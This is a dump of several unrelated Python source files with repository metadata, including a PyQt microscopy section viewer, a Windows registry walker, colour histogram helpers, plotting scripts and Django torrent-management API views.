def test_exception():
try:
raise Exception("test_exception")
except Exception:
pass
finally:
pass
# listcomp
def test_listcomp():
print("test_listcomp", [x for x in range(3)])
# lambda
def test_lambda():
func_obj_1 = lambda a, b: a + b
print(func_obj_1(10, 20))
# import
def test_import():
from sys_settrace_subdir import trace_importme
trace_importme.dummy()
trace_importme.saysomething()
# class
class TLClass:
def method():
pass
pass
def test_class():
class TestClass:
__anynum = -9
def method(self):
print("test_class_method")
self.__anynum += 1
def prprty_getter(self):
return self.__anynum
def prprty_setter(self, what):
self.__anynum = what
prprty = property(prprty_getter, prprty_setter)
cls = TestClass()
cls.method()
print("test_class_property", cls.prprty)
cls.prprty = 12
print("test_class_property", cls.prprty)
def run_tests():
test_func()
test_closure_inst = test_closure("test_closure")
test_closure_inst()
test_exception()
test_listcomp()
test_lambda()
test_class()
test_import()
print("And it's done!")
| [
"[email protected]"
] | |
c3accd3358621940fbdad50b1177f4ec90add8aa | 262195faec1b59ff67067f2dc7e3eb7db8dba946 | /src/setting sourcetoUTFformat.py | bf517cbcb3910c6092860bfe0e945eeba0ded980 | [
"MIT"
] | permissive | sudeep0901/python | 3a090ae2cd8a61e8e375cebb4722c051d2d766aa | 7a50af12e72d21ca4cad7f2afa4c6f929552043f | refs/heads/master | 2022-04-21T14:15:25.606241 | 2020-04-13T02:35:56 | 2020-04-13T02:35:56 | 155,167,294 | 0 | 0 | MIT | 2020-03-07T06:59:36 | 2018-10-29T07:08:06 | Jupyter Notebook | UTF-8 | Python | false | false | 109 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
s = "Jalape" # String in quotes is directly encoded in UTF-8.
| [
"[email protected]"
] | |
48853301e1d5994fd62e2e7ac0424f3762a446ea | 3a4fbde06794da1ec4c778055dcc5586eec4b7d2 | /@lib/01-18-2008-01/vyperlogix/win/registry/reg_walker.py | cc8b06833bd146af47d7804a83c6d80b046dc6b6 | [] | no_license | raychorn/svn_python-django-projects | 27b3f367303d6254af55c645ea003276a5807798 | df0d90c72d482b8a1e1b87e484d7ad991248ecc8 | refs/heads/main | 2022-12-30T20:36:25.884400 | 2020-10-15T21:52:32 | 2020-10-15T21:52:32 | 304,455,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,134 | py | import _winreg
__copyright__ = """\
(c). Copyright 2008-2011, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
def walk(top, writeable=False):
"""walk the registry starting from the key represented by
top in the form HIVE\\key\\subkey\\..\\subkey and generating
(key_name, key), subkey_names, values at each level.
subkey_names are simply names of the subkeys of that key
values are 3-tuples containing (name, data, data-type).
See the documentation for _winreg.EnumValue for more details.
"""
keymode = _winreg.KEY_READ
if writeable:
keymode |= _winreg.KEY_SET_VALUE
if "\\" not in top: top += "\\"
root, subkey = top.split ("\\", 1)
try:
key = _winreg.OpenKey (getattr (_winreg, root), subkey, 0, keymode)
except:
key = None
subkeys = []
if (key):
i = 0
while True:
try:
subkeys.append (_winreg.EnumKey (key, i))
i += 1
except EnvironmentError:
break
values = []
if (key):
i = 0
while True:
try:
values.append (_winreg.EnumValue (key, i))
i += 1
except EnvironmentError:
break
yield (top, key), subkeys, values
for subkey in subkeys:
for result in walk (top.rstrip ("\\") + "\\" + subkey, writeable):
yield result
| [
"[email protected]"
] | |
bb8ebe09cc5951038ac84d4a52cdc743bcf2eb2d | fb124e51024917d6479fa626d9607ff10f7a3aba | /storm-control/storm_control/steve/sections.py | 2a30384238f3ecf6446cca440e00b7198af7eebe | [
"MIT"
] | permissive | BehnamAbaie/storm-control | 054bd7bbd903ed9635e4d1121c30544f58473c4f | 0c686321142eccad62ce3365eae22c3b69229b0d | refs/heads/main | 2023-06-18T08:04:01.108874 | 2021-07-14T00:51:15 | 2021-07-14T00:51:15 | 342,049,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,245 | py | #!/usr/bin/env python
"""
The handles all the UI elements in the Mosaic tab.
Hazen 10/18
"""
import numpy
from PyQt5 import QtCore, QtGui, QtWidgets
import storm_control.sc_library.hdebug as hdebug
import storm_control.steve.coord as coord
import storm_control.steve.imageCapture as imageCapture
import storm_control.steve.positions as positions
import storm_control.steve.qtdesigner.sections_ui as sectionsUi
import storm_control.steve.steveItems as steveItems
import storm_control.steve.steveModule as steveModule
class SectionItem(steveItems.SteveItem):
brush = QtGui.QBrush(QtGui.QColor(255,255,255,0))
counter = 0
data_type = "section"
deselected_pen = QtGui.QPen(QtGui.QColor(0,0,255))
fields = ["x", "y", "angle"]
selected_pen = QtGui.QPen(QtGui.QColor(255,0,0))
ellipse_size = 1
def __init__(self, a_point = None, **kwds):
super().__init__(**kwds)
self.a_point = None
self.angle = 0
# Not used. The previous version of Steve kept track
# of the section number so we maintain that.
self.index = self.counter
self.counter += 1
self.x_size = coord.umToPix(self.ellipse_size)
self.y_size = coord.umToPix(self.ellipse_size)
self.graphics_item = QtWidgets.QGraphicsEllipseItem(0, 0, self.x_size, self.y_size)
self.graphics_item.setBrush(self.brush)
self.graphics_item.setPen(self.deselected_pen)
self.graphics_item.setZValue(999.0)
self.setLocation(a_point)
def changeField(self, field, df):
if (field == "x"):
self.movePosition(df, 0.0)
elif (field == "y"):
self.movePosition(0.0, df)
elif (field == "angle"):
self.angle += df
if (self.angle > 360.0):
self.angle -= 360.0
if (self.angle < 0.0):
self.angle += 360.0
else:
assert False, "No field " + field + "!"
def getAngle(self):
return self.angle
def getField(self, field):
# These need to match self.fields.
if (field == "x"):
return self.a_point.x_um
elif (field == "y"):
return self.a_point.y_um
elif (field == "angle"):
return self.angle
else:
assert False, "No field " + field + "!"
def getLocation(self):
return self.a_point
def movePosition(self, dx_um, dy_um):
a_point = coord.Point(self.a_point.x_um + dx_um,
self.a_point.y_um + dy_um,
"um")
self.setLocation(a_point)
def saveItem(self, directory, name_no_extension):
a_list = [self.index, self.a_point.x_um, self.a_point.y_um, self.angle]
return "{0:0d},{1:.2f},{2:.2f},{3:.2f}".format(*a_list)
def setAngle(self, angle):
self.angle = angle
def setLocation(self, a_point):
self.a_point = a_point
self.graphics_item.setPos(a_point.x_pix - 0.5 * self.x_size,
a_point.y_pix - 0.5 * self.y_size)
def setSelected(self, selected):
"""
If the object is selected, increase it's z value and change the pen
color, otherwise set the object's z value and pen color back to the
unselected values.
"""
if selected:
self.graphics_item.setZValue(1999.0)
self.graphics_item.setPen(self.selected_pen)
else:
self.graphics_item.setZValue(999.0)
self.graphics_item.setPen(self.deselected_pen)
def setVisible(self, visible):
self.graphics_item.setVisible(visible)
class SectionItemLoader(steveItems.SteveItemLoader):
"""
Creates a SectionItem from saved data.
"""
def load(self, directory, index, x, y, angle):
section_item = SectionItem(a_point = coord.Point(float(x), float(y), "um"))
section_item.setAngle(float(angle))
return section_item
class Sections(steveModule.SteveModule):
"""
This is the main class / the interface with steve.
"""
@hdebug.debug
def __init__(self, image_capture = None, **kwds):
super().__init__(**kwds)
self.image_capture = image_capture
self.initialized = False
SectionItem.ellipse_size = self.parameters.get("ellipse_size")
SectionItem.deselected_pen.setWidth(self.parameters.get("pen_width"))
SectionItem.selected_pen.setWidth(self.parameters.get("pen_width"))
self.ui = sectionsUi.Ui_Form()
self.ui.setupUi(self)
# Hide some things we don't use.
self.ui.backgroundComboBox.hide()
self.ui.backgroundLabel.hide()
self.ui.moveAllSectionsCheckBox.hide()
self.ui.showFeaturesCheckBox.hide()
self.ui.thresholdLabel.hide()
self.ui.thresholdSlider.hide()
# Model to store sections.
self.sections_model = QtGui.QStandardItemModel()
self.sections_model.setHorizontalHeaderLabels([""] + SectionItem.fields)
# Section renderer.
self.sections_renderer = SectionsRenderer(scene = self.item_store.getScene())
# View to manipulate sections.
self.sections_table_view = SectionsTableView(item_store = self.item_store,
step_size = self.parameters.get("step_size"))
self.sections_table_view.setModel(self.sections_model)
self.sections_table_view.setTitleBar(self.ui.sectionsGroupBox)
self.sections_table_view.horizontalHeader().setStretchLastSection(True)
self.sections_table_view.horizontalHeader().setMinimumSectionSize(20)
layout = QtWidgets.QVBoxLayout(self.ui.sectionsGroupBox)
layout.addWidget(self.sections_table_view)
layout.setContentsMargins(0,0,0,0)
self.ui.sectionsGroupBox.setLayout(layout)
# View to display section renders.
self.sections_view = SectionsView()
layout = QtWidgets.QVBoxLayout(self.ui.sectionsDisplayFrame)
layout.addWidget(self.sections_view)
self.ui.sectionsDisplayFrame.setLayout(layout)
# Connect signals.
self.ui.foregroundOpacitySlider.valueChanged.connect(self.handleForegroundOpacitySlider)
self.sections_model.itemChanged.connect(self.handleItemChanged)
self.sections_table_view.currentChangedEvent.connect(self.handleCurrentChangedEvent)
self.sections_view.changeSizeEvent.connect(self.handleChangeSizeEvent)
self.sections_view.changeZoomEvent.connect(self.handleChangeZoomEvent)
self.sections_view.pictureEvent.connect(self.handlePictureEvent)
self.sections_view.positionEvent.connect(self.handlePositionEvent)
self.sections_view.updateEvent.connect(self.handleUpdateEvent)
# Set mosaic file loader. This handles loading SectionItems from a mosaic file.
self.item_store.addLoader(SectionItem.data_type, SectionItemLoader())
def addSection(self, a_point, a_angle):
"""
Add a single section to the scene and to the model.
"""
# Create section item.
section_item = SectionItem(a_point = a_point)
section_item.setAngle(a_angle)
# Add to scene.
self.item_store.addItem(section_item)
# Add to model.
self.addSectionItem(section_item)
def addSectionItem(self, section_item):
"""
Add a single section item to the model.
"""
# Add to model. The elements in a row all share the same item.
row = []
item = SectionsStandardItem(section_item = section_item)
item.setCheckable(True)
row.append(item)
for field in section_item.fields:
row.append(SectionsStandardItem(field = field,
section_item = section_item))
self.sections_model.appendRow(row)
self.sections_table_view.updateTitle()
# Resize if this is the first element added.
if not self.initialized:
self.sections_table_view.resizeColumnsToContents()
self.initialized = True
def currentTabChanged(self, tab_index):
if (tab_index == 1):
for elt in self.item_store.itemIterator(item_type = SectionItem):
elt.setVisible(False)
else:
for elt in self.item_store.itemIterator(item_type = SectionItem):
elt.setVisible(True)
def handleAddSection(self, ignored):
"""
This is called by the popup menu in the mosaic tab or a
key press event in the mosiacs view.
"""
self.addSection(self.mosaic_event_coord, 0)
def handleChangeSizeEvent(self, width, height):
self.sections_renderer.setRenderSize(width, height)
self.updateSectionView()
def handleChangeZoomEvent(self, new_scale):
self.sections_renderer.setRenderScale(new_scale)
self.updateSectionView()
def handleCurrentChangedEvent(self):
self.updateSectionView()
def handleForegroundOpacitySlider(self, new_value):
self.sections_view.changeOpacity(new_value)
def handleItemChanged(self, item):
"""
This is called whenever a sections values changes.
"""
self.updateSectionView()
def handlePictureEvent(self, pict_type):
"""
Take pictures at/around each section location.
"""
movie_queue = []
# Single picture at each section.
if (pict_type == "s1"):
for item in self.sectionsStandardItemIterator():
movie_queue.append(item.getSectionItem().getLocation())
# Three picture spiral at each section.
elif (pict_type == "s3"):
for item in self.sectionsStandardItemIterator():
movie_queue.append(item.getSectionItem().getLocation())
movie_queue += imageCapture.createSpiral(3)
# Five picture spiral at each section.
elif (pict_type == "s5"):
for item in self.sectionsStandardItemIterator():
movie_queue.append(item.getSectionItem().getLocation())
movie_queue += imageCapture.createSpiral(5)
# Picture grid at each section.
elif (pict_type == "g"):
for item in self.sectionsStandardItemIterator():
movie_queue.append(item.getSectionItem().getLocation())
movie_queue += imageCapture.createGrid(*self.image_capture.getGridSize())
if (len(movie_queue) > 0):
self.image_capture.takeMovies(movie_queue)
def handlePositionEvent(self):
"""
Add a position at each section.
"""
#
# When we change back to the mosaic tab the Positions class will
# update it's model by querying the item store, so it is
# sufficient to just add the new positions to the item store.
#
for item in self.sectionsStandardItemIterator():
pos_item = positions.PositionItem(a_point = item.getSectionItem().getLocation())
self.item_store.addItem(pos_item)
self.updateSectionView()
def handleUpdateEvent(self):
self.updateSectionView()
def mosaicLoaded(self):
# Clear the current sections model. We need to do this otherwise
# we'll get duplicates of whatever is currently in the model.
self.sections_model.clear()
for section_item in self.item_store.itemIterator(item_type = SectionItem):
self.addSectionItem(section_item)
def sectionsStandardItemIterator(self):
for i in range(self.sections_model.rowCount()):
index = self.sections_model.index(i,0)
item = self.sections_model.itemFromIndex(index)
if isinstance(item, SectionsStandardItem):
yield item
def updateSectionView(self):
"""
Update the image in the section view.
"""
# FIXME? Usually only the background or the foreground will need to
# be updated, not both. This could be more efficient.
# Create background image.
counts = 0
numpy_bg = None
for item in self.sectionsStandardItemIterator():
if (item.checkState() == QtCore.Qt.Checked):
temp = self.sections_renderer.renderSectionNumpy(item.getSectionItem())
if numpy_bg is not None:
numpy_bg += temp
else:
numpy_bg = temp
counts += 1
if numpy_bg is not None:
numpy_bg = numpy_bg/float(counts)
numpy_bg = numpy_bg.astype(numpy.uint8)
image = QtGui.QImage(numpy_bg.data,
numpy_bg.shape[1],
numpy_bg.shape[0],
QtGui.QImage.Format_RGB32)
image.ndarray = numpy_bg
pixmap = QtGui.QPixmap.fromImage(image)
pixmap.qimage = image
self.sections_view.setBackgroundPixmap(pixmap)
# Create foreground image.
current_item = self.sections_model.itemFromIndex(self.sections_table_view.currentIndex())
if isinstance(current_item, SectionsStandardItem):
pixmap = self.sections_renderer.renderSectionPixmap(current_item.getSectionItem())
self.sections_view.setForegroundPixmap(pixmap)
self.sections_view.update()
class SectionsRenderer(QtWidgets.QGraphicsView):
"""
Handles rendering sections. It works by using the same QGraphicsScene as displayed in
the Mosaic tab. To render a section, it centers on the section, adjusts the angle and
scale rotation as appropriate, then grabs the contents of its viewport.
This object is not actual visible in the UI.
"""
def __init__(self, scene = None, **kwds):
super().__init__(**kwds)
self.scale = 0.5
self.setScene(scene)
self.setRenderHint(QtGui.QPainter.SmoothPixmapTransform)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
def renderSectionNumpy(self, section_item):
"""
Draw the section pixmap & convert to a numpy array.
"""
pixmap = self.renderSectionPixmap(section_item)
image = pixmap.toImage()
ptr = image.bits()
ptr.setsize(image.byteCount())
numpy_array = numpy.asarray(ptr).reshape(image.height(), image.width(), 4).astype(numpy.float)
return numpy_array
# # I'm not sure why, but ptr will sometimes be "None" so we need to catch this.
# if (type(ptr) != type(None)):
# ptr.setsize(image.byteCount())
# numpy_array = numpy.asarray(ptr).reshape(image.height(), image.width(), 4).astype(numpy.float)
# return numpy_array
# else:
# return False
def renderSectionPixmap(self, section_item):
"""
Draw the section pixmap.
"""
a_point = section_item.getLocation()
self.centerOn(a_point.x_pix, a_point.y_pix)
transform = QtGui.QTransform()
transform.rotate(section_item.getAngle())
transform.scale(self.scale, self.scale)
self.setTransform(transform)
return self.grab()
def setRenderScale(self, new_scale):
self.scale = new_scale
def setRenderSize(self, width, height):
self.setFixedSize(width, height)
class SectionsStandardItem(QtGui.QStandardItem):
def __init__(self, field = None, section_item = None, **kwds):
super().__init__(**kwds)
self.field = field
self.section_item = section_item
self.updateSectionText()
def changeValue(self, df):
self.section_item.changeField(self.field, df)
self.updateSectionText()
def getSectionItem(self):
return self.section_item
def setSelected(self, selected):
self.section_item.setSelected(selected)
def updateSectionText(self):
if self.field is not None:
self.setText("{0:.2f}".format(self.section_item.getField(self.field)))
class SectionsTableView(QtWidgets.QTableView):
currentChangedEvent = QtCore.pyqtSignal()
def __init__(self, item_store = None, step_size = None, **kwds):
super().__init__(**kwds)
self.initialized_widths = False
self.item_store = item_store
self.step_size = step_size
# Disable direct editting.
self.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.setToolTip("'w','s' to change selected cell value, 'backspace' to delete row, arrow keys to change cells.")
def currentChanged(self, current, previous):
"""
Called when the currently selected item in the table changes.
"""
previous_item = self.model().itemFromIndex(previous)
if isinstance(previous_item, SectionsStandardItem):
previous_item.setSelected(False)
current_item = self.model().itemFromIndex(current)
if isinstance(current_item, SectionsStandardItem):
current_item.setSelected(True)
self.currentChangedEvent.emit()
def keyPressEvent(self, event):
current_column = self.currentIndex().column()
current_item = self.model().itemFromIndex(self.currentIndex())
if isinstance(current_item, SectionsStandardItem) and (current_column > 0):
which_key = event.key()
# Delete current item.
if (which_key == QtCore.Qt.Key_Backspace) or (which_key == QtCore.Qt.Key_Delete):
self.model().removeRow(self.currentIndex().row())
self.item_store.removeItem(current_item.section_item.getItemID())
self.updateTitle()
elif (which_key == QtCore.Qt.Key_W):
current_item.changeValue(-self.step_size)
elif (which_key == QtCore.Qt.Key_S):
current_item.changeValue(self.step_size)
else:
super().keyPressEvent(event)
else:
super().keyPressEvent(event)
# def resizeEvent(self, event):
# if not self.initialized_widths:
# self.initialized_widths = True
#
# self.setColumnWidth(0, 10)
# width = int(self.width()/3) - 30
# for i in range(self.model().columnCount()-1):
# self.setColumnWidth(i + 1, width)
def setTitleBar(self, title_bar):
self.title_bar = title_bar
def updateTitle(self):
if self.title_bar is not None:
n = self.model().rowCount()
if (n == 0):
self.title_bar.setTitle("Sections")
else:
self.title_bar.setTitle("Sections ({0:d} total)".format(n))
class SectionsView(QtWidgets.QWidget):
"""
Displays the sections.
"""
changeSizeEvent = QtCore.pyqtSignal(int, int)
changeZoomEvent = QtCore.pyqtSignal(float)
pictureEvent = QtCore.pyqtSignal(str)
positionEvent = QtCore.pyqtSignal()
updateEvent = QtCore.pyqtSignal()
def __init__(self, **kwds):
super().__init__(**kwds)
self.background_pixmap = None
self.foreground_opacity = 0.5
self.foreground_pixmap = None
self.scale = 1.0
self.pictAct = QtWidgets.QAction(self.tr("Take Pictures"), self)
self.posAct = QtWidgets.QAction(self.tr("Record Positions"), self)
self.popup_menu = QtWidgets.QMenu(self)
self.popup_menu.addAction(self.pictAct)
self.popup_menu.addAction(self.posAct)
self.pictAct.triggered.connect(self.handlePictAct)
self.posAct.triggered.connect(self.handlePosAct)
self.setFocusPolicy(QtCore.Qt.ClickFocus)
self.setToolTip("' ', '1', '3', '5', 'g' to take pictures at each section.\n'u' to force an update.")
def changeOpacity(self, new_value):
self.foreground_opacity = 0.01 * new_value
self.update()
def handlePictAct(self, boolean):
self.pictureEvent.emit("s1")
def handlePosAct(self, boolean):
self.positionEvent.emit()
def keyPressEvent(self, event):
"""
'1' Take a single picture at each section.
'3' Take a 3 picture spiral at each section.
'5' Take a 5 picture spiral at each section.
'g' Take a grid of pictures at each section.
"""
# Picture taking.
if (event.key() == QtCore.Qt.Key_Space):
self.pictureEvent.emit("s1")
elif (event.key() == QtCore.Qt.Key_1):
self.pictureEvent.emit("s1")
elif (event.key() == QtCore.Qt.Key_3):
self.pictureEvent.emit("s3")
elif (event.key() == QtCore.Qt.Key_5):
self.pictureEvent.emit("s5")
elif (event.key() == QtCore.Qt.Key_G):
self.pictureEvent.emit("g")
# Force a display update.
elif (event.key() == QtCore.Qt.Key_U):
self.updateEvent.emit()
super().keyPressEvent(event)
def paintEvent(self, event):
"""
Draw a white background, the background pixmap (if it exists), the foreground
pixmap (if it exists) and the white centering lines.
"""
painter = QtGui.QPainter(self)
color = QtGui.QColor(255,255,255)
painter.setPen(color)
painter.setBrush(color)
painter.drawRect(0, 0, self.width(), self.height())
# Draw background pixmap
painter.setOpacity(1.0)
if self.background_pixmap is not None:
x_loc = (self.width() - self.background_pixmap.width())/2
y_loc = (self.height() - self.background_pixmap.height())/2
painter.drawPixmap(x_loc, y_loc, self.background_pixmap)
# Draw foreground pixmap
painter.setOpacity(self.foreground_opacity)
if self.foreground_pixmap is not None:
x_loc = (self.width() - self.foreground_pixmap.width())/2
y_loc = (self.height() - self.foreground_pixmap.height())/2
painter.drawPixmap(x_loc, y_loc, self.foreground_pixmap)
# Draw guides lines
#color = QtGui.QColor(128,128,128)
#painter.setPen(color)
#painter.setOpacity(1.0)
painter.setOpacity(0.2)
x_mid = self.width()/2
y_mid = self.height()/2
painter.drawLine(0, y_mid, self.width(), y_mid)
painter.drawLine(x_mid, 0, x_mid, self.height())
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.RightButton:
self.popup_menu.exec_(event.globalPos())
def resizeEvent(self, event):
self.changeSizeEvent.emit(self.width(), self.height())
def setBackgroundPixmap(self, pixmap):
self.background_pixmap = pixmap
def setForegroundPixmap(self, pixmap):
self.foreground_pixmap = pixmap
def wheelEvent(self, event):
if not event.angleDelta().isNull():
if (event.angleDelta().y() > 0):
self.scale = self.scale * 1.2
self.changeZoomEvent.emit(self.scale)
else:
self.scale = self.scale / 1.2
self.changeZoomEvent.emit(self.scale)
| [
"[email protected]"
] | |
291a893cff8acb6ab12dbcd9775261b0581e06d9 | 0b6d99c3ecc9a4d937345b85a80fb6558a4da397 | /function/lambda/c2.py | c9fd53c24893736eff8d2d9d4d3629a7db8bac0c | [] | no_license | huiup/python_notes | 3057058154d2b6ba0514913b9e55421614e1ea5e | 60f5513cefef054aec0deb4ca1b2eb9fdc263f9d | refs/heads/master | 2021-03-01T20:16:31.904703 | 2020-11-03T13:09:51 | 2020-11-03T13:09:51 | 245,811,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | #三元表达式
x = 4
y = 3
r = x if x > y else y
print(r) | [
"[email protected]"
] | |
c7dfc7725d763e85132830b5dcd849e65bf137c2 | bf0d7c8d987d5fda14208eb9ce70e31c83c25c25 | /c-ex4/plot_logs.py | 6151e8784b9f8a3d48023b055e5894d81ed693d0 | [] | no_license | SummerBigData/SamRepo | 7876e9393c7175e300e175a60c17633c3b23a1bb | fd84ad654370faa48c084349952c2921fde4032d | refs/heads/master | 2020-03-18T05:09:08.787956 | 2018-06-18T17:11:49 | 2018-06-18T17:11:49 | 134,327,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,894 | py | import numpy as np
import pandas as pd
from plotly.offline import plot
import plotly.graph_objs as go
import os
dirs = os.listdir('logs')
dirs = list(filter(lambda f: os.path.isdir('logs/'+f), dirs))
data = dict()
for name in dirs:
if not os.path.isfile('logs/'+name+'/cost_and_acc.csv'):
print name + ' does not have cost.csv'
continue
df = pd.read_csv('logs/'+name+'/cost_and_acc.csv')
if len(df['Cost'].as_matrix()) == 0:
continue
data[name] = (df['Cost'].as_matrix(), df[' Accuracy'].as_matrix())
for name, (cost, acc) in data.items():
if len(cost) < 3:
continue
data = [
go.Scatter(x=list(range(len(cost))),
y=cost,
mode='lines+markers',
name='Cost'),
go.Scatter(x=list(range(len(acc))),
y=acc,
mode='lines+markers',
name='Accuracy')
]
layout = go.Layout(
title=name,
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Metric Value')
)
plot({'data': data, 'layout': layout}, filename='plots/'+name+'_metrics.html')
"""
cost_traces = []
acc_traces = []
for name, (cost, acc) in data.items():
cost_traces.append(
go.Scatter(
x=list(range(len(cost))),
y=cost,
mode='lines+markers',
name=name))
acc_traces.append(
go.Scatter(
x=list(range(len(acc))),
y=acc,
mode='lines+markers',
name=name))
layout = go.Layout(
title='Cost over Time',
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Cost'))
plot({'data': cost_traces, 'layout': layout}, filename='costs.html')
layout = go.Layout(
title='Accuracy over Time',
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Accuracy'))
plot({'data': acc_traces, 'layout': layout}, filename='accs.html')
""" | [
"[email protected]"
] | |
4f5bd2145ed1e3def380adc78118dd2eac97e1b4 | d66141796bcaf9b1f895be0226f7400ca8d579cf | /color_histogram/core/hist_common.py | 8804159b85f6d765fc442976f017235e42123ff9 | [
"MIT"
] | permissive | absbin/ColorHistogram | 51004ca4bad2b83ff9f496cb6097d654fa30583f | 0743376d5d89d4c8aacc986bb3d64a0098877480 | refs/heads/master | 2020-04-21T17:37:15.035363 | 2019-02-10T19:50:09 | 2019-02-10T19:50:09 | 169,741,939 | 0 | 0 | MIT | 2019-02-08T13:51:22 | 2019-02-08T13:51:22 | null | UTF-8 | Python | false | false | 1,733 | py | # -*- coding: utf-8 -*-
## @package color_histogram.core.hist_common
#
# Common color histogram functions for 1D, 2D, 3D.
# @author tody
# @date 2015/08/29
import numpy as np
def colorCoordinates(color_ids, num_bins, color_range):
color_ids = np.array(color_ids).T
c_min, c_max = color_range
color_coordinates = c_min + (color_ids * (c_max - c_min)) / float(num_bins - 1.0)
return color_coordinates
def colorDensities(hist_bins):
hist_positive = hist_bins > 0.0
color_densities = np.float32(hist_bins[hist_positive])
density_max = np.max(color_densities)
color_densities = color_densities / density_max
return color_densities
def rgbColors(hist_bins, color_bins):
hist_positive = hist_bins > 0.0
colors = color_bins[hist_positive, :]
colors = np.clip(colors, 0.0, 1.0)
return colors
def clipLowDensity(hist_bins, color_bins, alpha):
density_mean = np.mean(hist_bins)
low_density = hist_bins < density_mean * alpha
hist_bins[low_density] = 0.0
for ci in xrange(3):
color_bins[low_density, ci] = 0.0
def densitySizes(color_densities, density_size_range):
density_size_min, density_size_max = density_size_range
density_size_factor = density_size_max / density_size_min
density_sizes = density_size_min * np.power(density_size_factor, color_densities)
return density_sizes
def range2ticks(tick_range, decimals=1):
ticks = np.around(tick_range, decimals=decimals)
ticks[ticks > 10] = np.rint(ticks[ticks > 10])
return ticks
def range2lims(tick_range):
unit = 0.1 * (tick_range[:, 1] - tick_range[:, 0])
lim = np.array(tick_range)
lim[:, 0] += -unit
lim[:, 1] += unit
return lim
| [
"[email protected]"
] | |
81519b9144aeb9c939806eb0d2d04dafbbf4b122 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/sets_20200609191647.py | c8142142fb9e8aff031b9767f3c3d70a3fcfbf5a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | import json
def Strings(str):
# dictionary--> key value pairs
values = {}
newArray = []
keys = []
for i in str:
newArray.append(i.split(":"))
for j in range(0,len(newArray)):
if newArray[j][0] in values:
values[j][0] += int(newArray[j][1])
else:
values[j][0].append(in)
# values[j][0] = int(newArray[j][1])
# if newArray[j][0] in values:
# values[newArray[j][0]] += int(newArray[j][1])
# else:
# values[newArray[j][0]] = int(newArray[j][1])
# for k in values:
# keys.append(k)
# keys = sorted(keys)
# newString = ""
# last =len(keys)-1
# lastString = ""
# lastString +=keys[last] + ":" + json.dumps(values[keys[last]])
# for i in range(len(keys)-1):
# if keys[i] in values:
# newString += keys[i] + ":"+ json.dumps(values[keys[i]])+","
# finalString = newString + lastString
# print(type(finalString))
Strings(["Z:1","B:3","C:3","Z:4","B:2"])
# "B:5,C:3,Z:5"
| [
"[email protected]"
] | |
ba97fb24529d7aa94bd21ccf716216cc351abd99 | 3437c90948fef98f3db081b741b96d50666b2a39 | /api/views.py | 0164884433e2f10716eb991bd19c55e9dfe8d968 | [] | no_license | jimrollenhagen/WhatManager3 | 897080e5125c0bbb5bce8366b0eb5ca1118e1bc8 | fb14b3527f6263045471fdd48384f1f7007c5bc0 | refs/heads/master | 2020-12-03T10:26:34.324705 | 2014-10-22T05:03:10 | 2014-10-21T21:57:12 | 25,735,775 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,477 | py | # Create your views here.
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from api.management import ApiManager
from torrents.client import TorrentManagerException
from torrents.models import ClientTorrent
from trackers.client import TrackerManagerException
from trackers.loader import get_tracker_torrent_model
@csrf_exempt
@require_POST
def add_torrent(request):
tracker = request.POST['tracker']
torrent_id = request.POST['torrent_id']
client = ApiManager()
try:
client.add_torrent(tracker, torrent_id)
except TrackerManagerException as e:
return JsonResponse(e.__dict__)
except TorrentManagerException as e:
return JsonResponse(e.__dict__)
return JsonResponse({'success': True})
@csrf_exempt
@require_POST
def delete_torrent(request):
info_hash = request.POST.get('info_hash')
tracker = request.POST.get('tracker')
torrent_id = request.POST.get('torrent_id')
client = ApiManager()
try:
client.delete_torrent(info_hash, tracker, torrent_id)
except TrackerManagerException as e:
return JsonResponse(e.__dict__)
except TorrentManagerException as e:
return JsonResponse(e.__dict__)
return JsonResponse({'success': True})
def torrents_status(request):
requested = {}
if 'info_hashes' in request.GET:
info_hashes = request.GET['info_hashes'].split(',')
for info_hash in info_hashes:
requested[info_hash] = info_hash
if 'tracker' in request.GET and 'ids' in request.GET:
ids = request.GET['ids'].split(',')
model = get_tracker_torrent_model(request.GET['tracker'])
for t in model.objects.filter(id__in=ids).only('id', 'info_hash'):
requested[t.id] = t.info_hash
torrents = {
t.info_hash: t for t in ClientTorrent.objects.filter(info_hash__in=requested.values())
}
statuses = {}
for key, info_hash in requested.items():
torrent = torrents.get(info_hash)
if torrent is None:
statuses[key] = {
'status': 'missing',
}
elif torrent.done < 1:
statuses[key] = {
'status': 'downloading',
'progress': torrent.done,
}
else:
statuses[key] = {
'status': 'downloaded',
}
return JsonResponse(statuses)
| [
"[email protected]"
] | |
